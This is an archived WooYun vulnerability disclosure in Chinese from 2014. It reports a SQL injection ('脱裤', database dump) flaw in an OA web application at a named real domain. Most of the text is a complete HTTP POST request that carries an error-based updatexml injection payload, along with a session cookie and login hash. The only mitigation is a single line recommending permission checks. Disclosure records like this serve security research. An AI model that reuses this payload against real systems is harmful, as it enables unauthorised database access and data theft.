乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-04-29: 积极联系厂商并且等待厂商认领中,细节不对外公开 2014-07-28: 厂商已经主动忽略漏洞,细节向公众公开
360库带计划收录的厂商,简单的SQL脱裤
漏洞利用:需要POST一段数据
POST http://oa.xun-ao.com/admin/user/user.post.php HTTP/1.1Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*Referer: http://oa.xun-ao.com/admin/user/user_edit.phpAccept-Language: zh-CNUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Content-Type: multipart/form-data; boundary=---------------------------7de168185b0368UA-CPU: AMD64Accept-Encoding: gzip, deflateConnection: Keep-AliveContent-Length: 1063Host: oa.xun-ao.comPragma: no-cacheCookie: PHPSESSID=b37ft762aldqvs1qceas4pub96; loginpass=faa87452e3adea3d7a8c5bd4b1882c44-----------------------------7de168185b0368Content-Disposition: form-data; name="post[name]"aaaaaa' and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))#-----------------------------7de168185b0368Content-Disposition: form-data; name="post[chinese_name]"asdasdas'-----------------------------7de168185b0368Content-Disposition: form-data; name="post[password]"adad'-----------------------------7de168185b0368Content-Disposition: form-data; name="post[nick_name]"adad'-----------------------------7de168185b0368Content-Disposition: form-data; name="post[description]"adad'-----------------------------7de168185b0368Content-Disposition: form-data; name="post[role_name]"admin-----------------------------7de168185b0368Content-Disposition: form-data; name="image_src"; filename=""Content-Type: application/octet-stream-----------------------------7de168185b0368Content-Disposition: form-data; name="id"0-----------------------------7de168185b0368Content-Disposition: form-data; name="post[role_level]"-----------------------------7de168185b0368--
加入权限验证吧
未能联系到厂商或者厂商积极拒绝